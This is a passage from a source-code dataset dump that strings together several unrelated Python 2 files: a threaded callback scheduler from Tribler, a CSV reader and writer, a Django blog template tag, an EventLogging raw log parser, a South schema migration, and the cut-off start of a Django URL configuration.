The call will be made after DELAY seconds. DELAY must be a floating point value.
When multiple calls should be, or should have been made, the PRIORITY will decide the order
at which the calls are made. Calls with a higher PRIORITY will be handled before calls with
a lower PRIORITY. PRIORITY must be an integer. The default PRIORITY is 0. The order will
be undefined for calls with the same PRIORITY.
Each call is identified with an ID_. A unique numerical identifier will be assigned when no
ID_ is specified. And specified id's must be (unicode)strings. Registering multiple calls
with the same ID_ is allowed, all calls will be handled normally, however, all these calls
will be removed if the associated ID_ is unregistered.
Once the call is performed the optional CALLBACK is registered to be called immediately.
The first parameter of the CALLBACK will always be either the returned value or the raised
exception. If CALLBACK_ARGS is given it will be appended to the first argument. If
CALLBACK_KARGS is given it is added to the callback as keyword arguments.
When INCLUDE_ID is True then ID_ or the generated identifier is given as the first argument
to CALL.
Returns ID_ if specified or a uniquely generated numerical identifier
Example:
> callback.register(my_func, delay=10.0)
> -> my_func() will be called after 10.0 seconds
Example:
> def my_generator():
> while True:
> print "foo"
> yield 1.0
> callback.register(my_generator)
> -> my_generator will be called immediately printing "foo", subsequently "foo" will be
printed at 1.0 second intervals
"""
assert callable(call), "CALL must be callable"
assert isinstance(args, tuple), "ARGS has invalid type: %s" % type(args)
assert kargs is None or isinstance(kargs, dict), "KARGS has invalid type: %s" % type(kargs)
assert isinstance(delay, float), "DELAY has invalid type: %s" % type(delay)
assert isinstance(priority, int), "PRIORITY has invalid type: %s" % type(priority)
assert isinstance(id_, basestring), "ID_ has invalid type: %s" % type(id_)
assert callback is None or callable(callback), "CALLBACK must be None or callable"
assert isinstance(callback_args, tuple), "CALLBACK_ARGS has invalid type: %s" % type(callback_args)
assert callback_kargs is None or isinstance(callback_kargs, dict), "CALLBACK_KARGS has invalid type: %s" % type(callback_kargs)
assert isinstance(include_id, bool), "INCLUDE_ID has invalid type: %d" % type(include_id)
if __debug__: dprint("register ", call, " after ", delay, " seconds")
with self._lock:
if not id_:
self._id += 1
id_ = self._id
if delay <= 0.0:
heappush(self._expired,
(-priority,
time(),
id_,
None,
(call, args + (id_,) if include_id else args, {} if kargs is None else kargs),
None if callback is None else (callback, callback_args, {} if callback_kargs is None else callback_kargs)))
else:
heappush(self._requests,
(delay + time(),
-priority,
id_,
(call, args + (id_,) if include_id else args, {} if kargs is None else kargs),
None if callback is None else (callback, callback_args, {} if callback_kargs is None else callback_kargs)))
# wakeup if sleeping
if not self._event_is_set():
self._event_set()
return id_
def persistent_register(self, id_, call, args=(), kargs=None, delay=0.0, priority=0, callback=None, callback_args=(), callback_kargs=None, include_id=False):
"""
Register CALL to be called only if ID_ has not already been registered.
Aside from the different behavior of ID_, all parameters behave as in register(...).
Example:
> callback.persistent_register("my-id", my_func, ("first",), delay=60.0)
> callback.persistent_register("my-id", my_func, ("second",))
> -> my_func("first") will be called after 60 seconds, my_func("second") will not be called at all
Example:
> callback.register(my_func, ("first",), delay=60.0, id_="my-id")
> callback.persistent_register("my-id", my_func, ("second",))
> -> my_func("first") will be called after 60 seconds, my_func("second") will not be called at all
"""
assert isinstance(id_, basestring), "ID_ has invalid type: %s" % type(id_)
assert id_, "ID_ may not be an empty (unicode)string"
assert callable(call), "CALL must be callable"
assert isinstance(args, tuple), "ARGS has invalid type: %s" % type(args)
assert kargs is None or isinstance(kargs, dict), "KARGS has invalid type: %s" % type(kargs)
assert isinstance(delay, float), "DELAY has invalid type: %s" % type(delay)
assert isinstance(priority, int), "PRIORITY has invalid type: %s" % type(priority)
assert callback is None or callable(callback), "CALLBACK must be None or callable"
assert isinstance(callback_args, tuple), "CALLBACK_ARGS has invalid type: %s" % type(callback_args)
assert callback_kargs is None or isinstance(callback_kargs, dict), "CALLBACK_KARGS has invalid type: %s" % type(callback_kargs)
assert isinstance(include_id, bool), "INCLUDE_ID has invalid type: %d" % type(include_id)
if __debug__: dprint("persistent register ", call, " after ", delay, " seconds")
with self._lock:
for tup in self._requests:
if tup[2] == id_:
break
else:
# not found in requests
for tup in self._expired:
if tup[2] == id_:
break
else:
# not found in expired
if delay <= 0.0:
heappush(self._expired,
(-priority,
time(),
id_,
None,
(call, args + (id_,) if include_id else args, {} if kargs is None else kargs),
None if callback is None else (callback, callback_args, {} if callback_kargs is None else callback_kargs)))
else:
heappush(self._requests,
(delay + time(),
-priority,
id_,
(call, args + (id_,) if include_id else args, {} if kargs is None else kargs),
None if callback is None else (callback, callback_args, {} if callback_kargs is None else callback_kargs)))
# wakeup if sleeping
if not self._event_is_set():
self._event_set()
return id_
def replace_register(self, id_, call, args=(), kargs=None, delay=0.0, priority=0, callback=None, callback_args=(), callback_kargs=None, include_id=False):
"""
Replace (if present) the currently registered call ID_ with CALL.
This is a faster way to handle an unregister and register call. All parameters behave as in
register(...).
"""
assert isinstance(id_, (basestring, int)), "ID_ has invalid type: %s" % type(id_)
assert id_, "ID_ may not be zero or an empty (unicode)string"
assert callable(call), "CALL must be callable"
assert isinstance(args, tuple), "ARGS has invalid type: %s" % type(args)
assert kargs is None or isinstance(kargs, dict), "KARGS has invalid type: %s" % type(kargs)
assert isinstance(delay, float), "DELAY has invalid type: %s" % type(delay)
assert isinstance(priority, int), "PRIORITY has invalid type: %s" % type(priority)
assert callback is None or callable(callback), "CALLBACK must be None or callable"
assert isinstance(callback_args, tuple), "CALLBACK_ARGS has invalid type: %s" % type(callback_args)
assert callback_kargs is None or isinstance(callback_kargs, dict), "CALLBACK_KARGS has invalid type: %s" % type(callback_kargs)
assert isinstance(include_id, bool), "INCLUDE_ID has invalid type: %d" % type(include_id)
if __debug__: dprint("replace register ", call, " after ", delay, " seconds")
with self._lock:
# un-register
for index, tup in enumerate(self._requests_mirror):
if tup[2] == id_:
self._requests_mirror[index] = (tup[0], tup[1], id_, None, None)
if __debug__: dprint("in _requests: ", id_)
for index, tup in enumerate(self._expired_mirror):
if tup[2] == id_:
self._expired_mirror[index] = (tup[0], tup[1], id_, tup[3], None, None)
if __debug__: dprint("in _expired: ", id_)
# register
if delay <= 0.0:
heappush(self._expired,
(-priority,
time(),
id_,
None,
(call, args + (id_,) if include_id else args, {} if kargs is None else kargs),
None if callback is None else (callback, callback_args, {} if callback_kargs is None else callback_kargs)))
else:
heappush(self._requests,
(delay + time(),
-priority,
id_,
(call, args + (id_,) if include_id else args, {} if kargs is None else kargs),
None if callback is None else (callback, callback_args, {} if callback_kargs is None else callback_kargs)))
# wakeup if sleeping
if not self._event_is_set():
self._event_set()
return id_
def unregister(self, id_):
"""
Unregister a callback using the ID_ obtained from the register(...) method
"""
assert isinstance(id_, (basestring, int)), "ROOT_ID has invalid type: %s" % type(id_)
assert id_, "ID_ may not be zero or an empty (unicode)string"
if __debug__: dprint(id_)
with self._lock:
# un-register
for index, tup in enumerate(self._requests_mirror):
if tup[2] == id_:
self._requests_mirror[index] = (tup[0], tup[1], id_, None, None)
if __debug__: dprint("in _requests: ", id_)
for index, tup in enumerate(self._expired_mirror):
if tup[2] == id_:
self._expired_mirror[index] = (tup[0], tup[1], id_, tup[2], None, None)
if __debug__: dprint("in _expired: ", id_)
def call(self, call, args=(), kargs=None, delay=0.0, priority=0, id_="", include_id=False, timeout=0.0, default=None):
"""
Register a blocking CALL to be made, waits for the call to finish, and returns or raises the
result.
TIMEOUT gives the maximum amount of time to wait before un-registering CALL. No timeout
will occur when TIMEOUT is 0.0. When a timeout occurs the DEFAULT value is returned.
TIMEOUT is unused when called from the same thread.
DEFAULT can be anything. The DEFAULT value is returned when a TIMEOUT occurs. When DEFAULT
is an Exception instance it will be raised instead of returned.
For the arguments CALL, ARGS, KARGS, DELAY, PRIORITY, ID_, and INCLUDE_ID: see the register(...) method.
"""
assert isinstance(timeout, float)
assert 0.0 <= timeout
assert self._thread_ident
def callback(result):
container[0] = result
event.set()
if self._thread_ident == get_ident():
if kargs:
return call(*args, **kargs)
else:
return call(*args)
else:
# result container
container = [default]
event = Event()
# register the call
self.register(call, args, kargs, delay, priority, id_, callback, (), None, include_id)
# wait for call to finish
event.wait(None if timeout == 0.0 else timeout)
if isinstance(container[0], Exception):
raise container[0]
else:
return container[0]
def start(self, name="Generic-Callback", wait=True):
"""
Start the asynchronous thread.
Creates a new thread and calls the _loop() method.
"""
assert self._state == "STATE_INIT", "Already (done) running"
assert isinstance(name, str)
assert isinstance(wait, bool), "WAIT has invalid type: %s" % type(wait)
if __debug__: dprint()
with self._lock:
self._state = "STATE_PLEASE_RUN"
if __debug__:
dprint("STATE_PLEASE_RUN")
self._debug_thread_name = name
thread = Thread(target=self._loop, name=name)
thread.daemon = True
thread.start()
if wait:
# Wait until the thread has started
while self._state == "STATE_PLEASE_RUN":
sleep(0.01)
return self.is_running
def stop(self, timeout=10.0, wait=True, exception=None):
"""
Stop the asynchronous thread.
When called with wait=True on the same thread we will return immediately.
"""
assert isinstance(timeout, float)
assert isinstance(wait, bool)
if __debug__: dprint()
if self._state == "STATE_RUNNING":
with self._lock:
if exception:
self._exception = exception
self._exception_traceback = exc_info()[2]
self._state = "STATE_PLEASE_STOP"
if __debug__: dprint("STATE_PLEASE_STOP")
# wakeup if sleeping
self._event.set()
if wait and not self._thread_ident == get_ident():
while self._state == "STATE_PLEASE_STOP" and timeout > 0.0:
sleep(0.01)
timeout -= 0.01
if __debug__:
if timeout <= 0.0:
dprint("timeout. perhaps callback.stop() was called on the same thread?")
return self.is_finished
def loop(self):
"""
Use the calling thread for this Callback instance.
"""
if __debug__: dprint()
with self._lock:
self._state = "STATE_PLEASE_RUN"
if __debug__: dprint("STATE_PLEASE_RUN")
self._loop()
@attach_profiler
def _loop(self):
if __debug__:
dprint()
time_since_expired = 0
if prctl:
prctl.set_name("Tribler" + currentThread().getName())
# put some often used methods and object in the local namespace
actual_time = 0
event_clear = self._event.clear
event_wait = self._event.wait
event_is_set = self._event.isSet
expired = self._expired
get_timestamp = time
lock = self._lock
requests = self._requests
self._thread_ident = get_ident()
with lock:
if self._state == "STATE_PLEASE_RUN":
self._state = "STATE_RUNNING"
if __debug__: dprint("STATE_RUNNING")
while 1:
actual_time = get_timestamp()
with lock:
# check if we should continue to run
if self._state != "STATE_RUNNING":
break
# move expired requests from REQUESTS to EXPIRED
while requests and requests[0][0] <= actual_time:
# notice that the deadline and priority entries are switched, hence, the entries in
# the EXPIRED list are ordered by priority instead of deadline
deadline, priority, root_id, call, callback = heappop(requests)
heappush(expired, (priority, deadline, root_id, None, call, callback))
if expired:
if __debug__ and len(expired) > 10:
if not time_since_expired:
time_since_expired = actual_time
# we need to handle the next call in line
priority, deadline, root_id, _, call, callback = heappop(expired)
wait = 0.0
if __debug__:
self._debug_call_name = self._debug_call_to_string(call)
# ignore removed tasks
if call is None:
continue
else:
# there is nothing to handle
wait = requests[0][0] - actual_time if requests else 300.0
if __debug__:
dprint("nothing to handle, wait ", wait, " seconds")
if time_since_expired:
diff = actual_time - time_since_expired
if diff > 1.0:
dprint("took ", round(diff, 2), " to process expired queue", level="warning")
time_since_expired = 0
if event_is_set():
event_clear()
if wait:
if __debug__: dprint("%d wait at most %.3fs before next call, still have %d calls in queue" % (time(), wait, len(requests)))
event_wait(wait)
else:
if __debug__:
dprint(self._debug_thread_name, "] calling ", self._debug_call_name, " (prio:", priority, ", id:", root_id, ")")
debug_call_start = time()
# call can be either:
# 1. a generator
# 2. a (callable, args, kargs) tuple
try:
if isinstance(call, TupleType):
# callback
result = call[0](*call[1], **call[2])
if isinstance(result, GeneratorType):
# we only received the generator, no actual call has been made to the
# function yet, therefore we call it again immediately
call = result
elif callback:
with lock:
heappush(expired, (priority, actual_time, root_id, None, (callback[0], (result,) + callback[1], callback[2]), None))
if isinstance(call, GeneratorType):
# start next generator iteration
result = call.next()
assert isinstance(result, float), [type(result), call]
assert result >= 0.0, [result, call]
with lock:
heappush(requests, (get_timestamp() + result, priority, root_id, call, callback))
except StopIteration:
if callback:
with lock:
heappush(expired, (priority, actual_time, root_id, None, (callback[0], (result,) + callback[1], callback[2]), None))
except (SystemExit, KeyboardInterrupt, GeneratorExit, AssertionError), exception:
dprint("attempting proper shutdown", exception=True, level="error")
with lock:
self._state = "STATE_EXCEPTION"
self._exception = exception
self._exception_traceback = exc_info()[2]
self._call_exception_handlers(exception, True)
except Exception, exception:
if callback:
with lock:
heappush(expired, (priority, actual_time, root_id, None, (callback[0], (exception,) + callback[1], callback[2]), None))
if __debug__:
dprint("__debug__ only shutdown", exception=True, level="error")
with lock:
self._state = "STATE_EXCEPTION"
self._exception = exception
self._exception_traceback = exc_info()[2]
self._call_exception_handlers(exception, True)
else:
dprint(exception=True, level="error")
self._call_exception_handlers(exception, False)
if __debug__:
debug_call_duration = time() - debug_call_start
if debug_call_duration > 1.0:
dprint(round(debug_call_duration, 2), "s call to ", self._debug_call_name, level="warning")
with lock:
# allowing us to refuse any new tasks. _requests_mirror and _expired_mirror will still
# allow tasks to be removed
self._requests = []
self._expired = []
# call all expired tasks and send GeneratorExit exceptions to expired generators, note that
# new tasks will not be accepted
if __debug__: dprint(self._debug_thread_name, "] there are ", len(expired), " expired tasks")
while expired:
_, _, _, _, call, callback = heappop(expired)
if isinstance(call, TupleType):
try:
result = call[0](*call[1], **call[2])
except:
dprint(exception=True, level="error")
else:
if isinstance(result, GeneratorType):
# we only received the generator, no actual call has been made to the
# function yet, therefore we call it again immediately
call = result
elif callback:
try:
callback[0](result, *callback[1], **callback[2])
except:
dprint(exception=True, level="error")
if isinstance(call, GeneratorType):
if __debug__: dprint("raise Shutdown in ", call)
try:
call.close()
except:
dprint(exception=True, level="error")
# send GeneratorExit exceptions to scheduled generators
if __debug__: dprint("there are ", len(requests), " scheduled tasks")
while requests:
_, _, _, call, _ = heappop(requests)
if isinstance(call, GeneratorType):
if __debug__: dprint("raise Shutdown in ", call)
try:
call.close()
except:
dprint(exception=True, level="error")
# set state to finished
with lock:
if __debug__: dprint("STATE_FINISHED")
self._state = "STATE_FINISHED"
if __debug__:
def main():
c = Callback()
c.start()
d = Callback()
d.start()
def call1():
dprint(time())
sleep(2)
dprint(time())
c.register(call1, delay=1.0)
sleep(2)
dprint(line=1)
def call2():
delay = 3.0
for i in range(10):
dprint(time(), " ", i)
sleep(delay)
if delay > 0.0:
delay -= 1.0
yield 1.0
c.register(call2)
sleep(11)
dprint(line=1)
def call3():
delay = 3.0
for i in range(10):
dprint(time(), " ", i)
yield Switch(d)
# perform code on Callback d
sleep(delay)
if delay > 0.0:
delay -= 1.0
yield Switch(c)
# perform code on Callback c
c.register(call3)
sleep(11.0)
dprint(line=1)
# CPU intensive call... should 'back off'
def call4():
for _ in xrange(10):
sleep(2.0)
desync = (yield 1.0)
dprint("desync... ", desync)
while desync > 0.1:
dprint("backing off... ", desync)
desync = (yield desync)
dprint("next try... ", desync)
dprint(line=1)
def call5_bussy():
for _ in xrange(10):
desync = yield 0.0
dprint("on bussy (", desync, ")")
sleep(0.4)
def call5_idle():
for _ in xrange(10):
desync = yield Idle()
dprint("on idle (", desync, ")")
c.register(call5_bussy)
c.register(call5_idle)
dprint(line=1)
def call6():
dprint("before")
yield Idle(5.0)
dprint("after")
c.register(call6)
def call7():
dprint("init")
while True:
yield 1.0
dprint("-")
c.unregister(task_id)
task_id = c.register(call7)
c.unregister(task_id)
sleep(21.0)
dprint(line=1)
def call8(index):
container1[index] += 1
def call9(index):
container2[index] += 1
def call10():
indexes = range(len(container1))
random.shuffle(indexes)
for index in indexes:
c.register(call8, (index,))
for index in indexes:
c.register(call8, (index,), id_="debug-test-%s" % index)
for index in xrange(len(container1)):
c.unregister("debug-test-%s" % index)
for index in indexes:
c.register(call8, (index,), delay=60.0, id_="debug-test-2-%s" % index)
for index in xrange(len(container1)):
c.unregister("debug-test-2-%s" % index)
for index in indexes:
c.register(call8, (index,), id_="debug-test-3-%s" % index)
for index in xrange(len(container1)):
c.replace_register("debug-test-3-%s" % index, call9, (index,))
for index in indexes:
c.register(call8, (index,), delay=60.0, id_="debug-test-4-%s" % index)
for index in xrange(len(container1)):
c.replace_register("debug-test-4-%s" % index, call9, (index,))
for index in indexes:
c.register(call8, (index,), delay=1.0)
import random
container1 = [0] * 1000
container2 = [0] * len(container1)
c.register(call10)
sleep(10.0)
assert all(value == 2 for value in container1), container1
assert all(value == 2 for value in container2), container2
d.stop()
c.stop()
if __name__ == "__main__":
main()
|
UTF-8
|
Python
| false | false | 2,013 |
7,275,674,629,504 |
bce5fb14b76805613c2afbef3ff550298f358499
|
fcf3d18890793500d6c889256da459b8b75a6801
|
/SnakeSQL/external/CSVParser.py
|
5a104af3e1b4b0f5d7e4d237ff067171ef563256
|
[] |
no_license
|
elgamar/snakesql-py2.7
|
https://github.com/elgamar/snakesql-py2.7
|
12a71c37dc18ae8114c3dc2b45eed4894854659b
|
c99eb133e219cc431dbc557bf64b9adc8b4839a1
|
refs/heads/master
| 2016-08-04T14:02:48.351658 | 2013-11-19T21:35:33 | 2013-11-19T21:35:33 | 14,568,859 | 1 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"CSV file reader and writer functions. Fully support Excel and other CSV files."
# Imports
from StringParsers import parseCSV, buildCSV
# CSV
def readCSV(filename, separater=',', quote='"', linebreak='\n'):
fp = open(filename,'rb')
lines = fp.read()
fp.close()
return parseCSV(lines, separater, quote, linebreak)
def writeCSV(filename, lines, separater=',', quote='"', linebreak='\n'):
fp = open(filename,'wb')
fp.write(buildCSV(lines, separater, quote, linebreak))
fp.close()
if __name__ == '__main__':
csvData = [
['Hello','World!', 'D" ",,\n"dsfg,\n,", ,'],
['Row 2','World!',"Dod' difficult ' , one to deal,, with"],
]
writeCSV('test.csv', csvData)
result = readCSV('test.csv')
if csvData == result:
print "PASSED: The written and re-read CSV file produces identical objects to the original"
else:
print "FAILED: The written and re-read CSV file isn't the same as the original."
print result
|
UTF-8
|
Python
| false | false | 2,013 |
15,719,580,327,680 |
0eea831f006c7397f53df88650926d1986d98b8a
|
0ba7d7484d1e20ac9c900272e889062ede4e0e7f
|
/dolweb/blog/templatetags/blog_tags.py
|
2bf29f4fa41a44001594decec1ebb2006ba37bc6
|
[
"CC-BY-SA-3.0",
"CC-BY-4.0",
"MIT"
] |
non_permissive
|
Llumex03/www
|
https://github.com/Llumex03/www
|
f5b975eb4e1f6a503419fecd368a11a54a9a9049
|
3fe8538f5a273b4e6bef285b380a507cb9538d3b
|
refs/heads/master
| 2020-02-24T15:52:40.690064 | 2014-05-08T17:31:04 | 2014-05-08T17:31:04 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.template import Library
register = Library()
from bs4 import BeautifulSoup
from django.conf import settings
from django.template import defaultfilters
from dolweb.blog.models import BlogSerie
@register.inclusion_tag('blog_chunk_series.html')
def get_blog_series(number=5):
"""Return the most recent visible blog series"""
return {
'series': BlogSerie.objects.filter(visible=True)[:number],
}
@register.filter
def cuthere_excerpt(content):
try:
cut_here = BeautifulSoup(content).find('a', id='cuthere')
return ''.join(map(str, reversed(cut_here.parent.find_previous_siblings())))
except AttributeError:
return defaultfilters.truncatewords(content, 100)
|
UTF-8
|
Python
| false | false | 2,014 |
13,365,938,256,590 |
a5574a497d9e3e24387418721fd42f970f85617e
|
b900811ab9ff3a375c55b7684a6149137ff38f7e
|
/extensions/EventLogging/server/eventlogging/parse.py
|
b9200cf736a4d1df34dd936c6e9f1e655cfc59d4
|
[
"LicenseRef-scancode-free-unknown",
"GPL-2.0-or-later",
"LGPL-2.0-or-later",
"CC-BY-NC-4.0",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-generic-exception",
"CC-BY-SA-3.0",
"GPL-1.0-or-later",
"LicenseRef-scancode-proprietary-license",
"GPL-2.0-only",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-public-domain"
] |
non_permissive
|
legoktm/wikihow-src
|
https://github.com/legoktm/wikihow-src
|
a960d739a65d48b1b037ee05424899bf24556f4c
|
9f86a754d7738eec03fd2c44adc4bea1e09fb1b7
|
refs/heads/master
| 2016-09-05T20:30:42.447182 | 2014-05-25T23:14:52 | 2014-05-26T05:51:26 | 18,299,790 | 4 | 3 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
"""
eventlogging.parse
~~~~~~~~~~~~~~~~~~
This module provides a scanf-like parser for raw log lines.
The format specifiers hew closely to those accepted by varnishncsa.
See the `varnishncsa documentation <https://www.varnish-cache.org
/docs/trunk/reference/varnishncsa.html>`_ for details.
Field specifiers
================
+--------+-----------------------------+
| Symbol | Field |
+========+=============================+
| %h | Client IP |
+--------+-----------------------------+
| %j | JSON object |
+--------+-----------------------------+
| %l | Hostname of origin |
+--------+-----------------------------+
| %n | Sequence ID |
+--------+-----------------------------+
| %q | Query-string-encoded JSON |
+--------+-----------------------------+
| %t | Timestamp in NCSA format. |
+--------+-----------------------------+
"""
from __future__ import division, unicode_literals
import calendar
import hashlib
import os
import re
import time
from .compat import json, unquote_plus
__all__ = ('LogParser', 'ncsa_to_epoch', 'ncsa_utcnow')
#: Salt value for hashing IPs. Because this value is generated at
#: runtime, IPs cannot be compared across restarts. This limitation is
#: tolerated because it helps underscore the field's unsuitability for
#: analytic purposes. Client IP is logged solely for detecting and
#: grouping spam coming from a single origin so that it can be filtered
#: out of the logs.
salt = os.urandom(16)
#: Format string (as would be passed to `strftime`) for timestamps in
#: NCSA Common Log Format.
NCSA_FORMAT = '%Y-%m-%dT%H:%M:%S'
def ncsa_to_epoch(ncsa_ts):
"""Converts an NCSA Common Log Format timestamp to an integer
timestamp representing the number of seconds since epoch UTC.
:param ncsa_ts: Timestamp in NCSA format.
"""
return calendar.timegm(time.strptime(ncsa_ts, NCSA_FORMAT))
def ncsa_utcnow():
"""Gets the current UTC date and time in NCSA Common Log Format"""
return time.strftime(NCSA_FORMAT, time.gmtime())
def hash_value(val):
"""Produces a salted SHA1 hash of any string value.
:param val: String to hash.
"""
hash = hashlib.sha1(val.encode('utf-8') + salt)
return hash.hexdigest()
def decode_qson(qson):
"""Decodes a QSON (query-string-encoded JSON) object.
:param qs: Query string.
"""
return json.loads(unquote_plus(qson.strip('?;')))
#: A mapping of format specifiers to a tuple of (regexp, caster).
format_specifiers = {
'%h': (r'(?P<clientIp>\S+)', hash_value),
'%j': (r'(?P<capsule>\S+)', json.loads),
'%l': (r'(?P<recvFrom>\S+)', str),
'%n': (r'(?P<seqId>\d+)', int),
'%q': (r'(?P<capsule>\?\S+)', decode_qson),
'%t': (r'(?P<timestamp>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})',
ncsa_to_epoch),
}
class LogParser(object):
"""Parses raw varnish/MediaWiki log lines into encapsulated events."""
def __init__(self, format):
"""Constructor.
:param format: Format string.
"""
self.format = format
#: Field casters, ordered by the relevant field's position in
#: format string.
self.casters = []
#: Compiled regexp.
self.re = re.compile(re.sub(r'(?<!%)%[hjlnqt]', self._repl, format))
def _repl(self, spec):
"""Replace a format specifier with its expanded regexp matcher
and append its caster to the list. Called by :func:`re.sub`.
"""
matcher, caster = format_specifiers[spec.group()]
self.casters.append(caster)
return matcher
def parse(self, line):
"""Parse a log line into a map of field names / values."""
match = self.re.match(line)
if match is None:
raise ValueError(self.re, line)
keys = sorted(match.groupdict(), key=match.start)
event = {k: f(match.group(k)) for f, k in zip(self.casters, keys)}
event.update(event.pop('capsule'))
return event
def __repr__(self):
return '<LogParser(\'%s\')>' % self.format
|
UTF-8
|
Python
| false | false | 2,014 |
3,049,426,782,029 |
1d7a3075794abe19d23432baf8c02fd70ab5dc45
|
246fabdd0ede2bc44c8f90ef942c2e3a1698cfb7
|
/news21national/core/migrations/0002_extend_profile.py
|
224e9a3347d12bee652b2152e78907a349f87b4a
|
[] |
no_license
|
news21/news21-national
|
https://github.com/news21/news21-national
|
43ece7316f1681e8f051643f1d1871be41ff5e01
|
191318ced4150943d14bfedca31252d63f30bca2
|
refs/heads/master
| 2016-09-05T14:01:44.428627 | 2011-06-10T21:32:08 | 2011-06-10T21:32:08 | 494,375 | 3 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from south.db import db
from django.db import models
from news21national.core.models import *
class Migration:
def forwards(self, orm):
# Adding model 'UserSkills'
db.create_table('core_userskills', (
('id', models.AutoField(primary_key=True)),
('user', models.ForeignKey(orm['auth.User'])),
('skill', models.ForeignKey(orm.Skill)),
('sort', models.IntegerField()),
('created_by', models.ForeignKey(orm['auth.User'], related_name="userskill_created_by")),
('created_at', models.DateTimeField(editable=False)),
))
db.send_create_signal('core', ['UserSkills'])
# Adding model 'Skill'
db.create_table('core_skill', (
('id', models.AutoField(primary_key=True)),
('title', models.CharField(max_length=200)),
))
db.send_create_signal('core', ['Skill'])
# Adding model 'UserSuggestedLeads'
db.create_table('core_usersuggestedleads', (
('id', models.AutoField(primary_key=True)),
('user', models.ForeignKey(orm['auth.User'])),
('oulet', models.CharField(max_length=200)),
('outlet_uri', models.CharField(max_length=300)),
('outlet_phone', models.CharField(max_length=25, blank=True)),
('created_by', models.ForeignKey(orm['auth.User'], related_name="usersuggestedleads_created_by")),
('created_at', models.DateTimeField(editable=False)),
))
db.send_create_signal('core', ['UserSuggestedLeads'])
# Adding field 'Profile.facebookid'
db.add_column('core_profile', 'facebookid', models.CharField(max_length=200))
# Adding field 'Profile.gender'
db.add_column('core_profile', 'gender', models.BooleanField(default=True))
# Adding field 'Profile.blog_uri'
db.add_column('core_profile', 'blog_uri', models.CharField(max_length=300))
# Adding field 'Profile.twitterid'
db.add_column('core_profile', 'twitterid', models.CharField(max_length=200))
# Adding field 'Profile.bio'
db.add_column('core_profile', 'bio', models.TextField())
# Adding field 'Profile.linkedinid'
db.add_column('core_profile', 'linkedinid', models.CharField(max_length=200))
def backwards(self, orm):
# Deleting model 'UserSkills'
db.delete_table('core_userskills')
# Deleting model 'Skill'
db.delete_table('core_skill')
# Deleting model 'UserSuggestedLeads'
db.delete_table('core_usersuggestedleads')
# Deleting field 'Profile.facebookid'
db.delete_column('core_profile', 'facebookid')
# Deleting field 'Profile.gender'
db.delete_column('core_profile', 'gender')
# Deleting field 'Profile.blog_uri'
db.delete_column('core_profile', 'blog_uri')
# Deleting field 'Profile.twitterid'
db.delete_column('core_profile', 'twitterid')
# Deleting field 'Profile.bio'
db.delete_column('core_profile', 'bio')
# Deleting field 'Profile.linkedinid'
db.delete_column('core_profile', 'linkedinid')
models = {
'core.profile': {
'bio': ('models.TextField', [], {}),
'blog_uri': ('models.CharField', [], {'max_length': '300'}),
'facebookid': ('models.CharField', [], {'max_length': '200'}),
'gender': ('models.BooleanField', [], {'default': 'True'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'linkedinid': ('models.CharField', [], {'max_length': '200'}),
'phone': ('models.CharField', [], {'max_length': '25', 'blank': 'True'}),
'twitterid': ('models.CharField', [], {'max_length': '200'}),
'user': ('models.ForeignKey', ["orm['auth.User']"], {})
},
'core.userskills': {
'created_at': ('models.DateTimeField', [], {'editable': 'False'}),
'created_by': ('models.ForeignKey', ["orm['auth.User']"], {'related_name': '"userskill_created_by"'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'skill': ('models.ForeignKey', ["orm['core.Skill']"], {}),
'sort': ('models.IntegerField', [], {}),
'user': ('models.ForeignKey', ["orm['auth.User']"], {})
},
'core.skill': {
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'title': ('models.CharField', [], {'max_length': '200'})
},
'auth.user': {
'_stub': True,
'id': ('models.AutoField', [], {'primary_key': 'True'})
},
'core.usersuggestedleads': {
'created_at': ('models.DateTimeField', [], {'editable': 'False'}),
'created_by': ('models.ForeignKey', ["orm['auth.User']"], {'related_name': '"usersuggestedleads_created_by"'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'oulet': ('models.CharField', [], {'max_length': '200'}),
'outlet_phone': ('models.CharField', [], {'max_length': '25', 'blank': 'True'}),
'outlet_uri': ('models.CharField', [], {'max_length': '300'}),
'user': ('models.ForeignKey', ["orm['auth.User']"], {})
}
}
complete_apps = ['core']
|
UTF-8
|
Python
| false | false | 2,011 |
8,632,884,268,161 |
191cab5e067307e27b48396989556b84f82c0a0b
|
ee3efcacefe1aa9657bbfbdd6ec269cc110d3c50
|
/AMP/NthSmallestElementInBinarySearchTree.py
|
e16287121349453ee294aeeba0590a4558c406bb
|
[] |
no_license
|
qz267/leet-code-fun
|
https://github.com/qz267/leet-code-fun
|
2ce7dcde9581e75122baac7bb4d64a77faa1f8ab
|
93598fdb543706cba5ecc815d40a1e162766c2a2
|
refs/heads/master
| 2020-04-17T19:54:47.875461 | 2014-07-22T18:33:19 | 2014-07-22T18:33:19 | 11,535,821 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
__author__ = 'zhengqin'
class Solution(object):
"""
Question: Write a function to find the nth smallest element in a binary search tree
"""
|
UTF-8
|
Python
| false | false | 2,014 |
11,819,750,022,080 |
dc8dae8c10d936485e4d81eb52c42858a9a2c18b
|
d4f7609a700e45da9b7128ffc306616dfbc7607c
|
/urls.py
|
d1b4955c39f9618c43b015d372a6e8e31afc788b
|
[] |
no_license
|
Skorch/blorgmusic
|
https://github.com/Skorch/blorgmusic
|
e8fd8b58a1f5397d23dcb9e7c37c18b742b79914
|
aab78113f9d218e58cb0dfe6693c0a351566caeb
|
refs/heads/master
| 2016-09-06T02:04:23.499432 | 2011-07-01T16:58:01 | 2011-07-01T16:58:01 | 1,748,830 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from django.conf.urls.defaults import *
from BlorgMusicHandler.ajaxhandler import *
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
# Uncomment the admin/doc line below to enable admin documentation:
# (r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
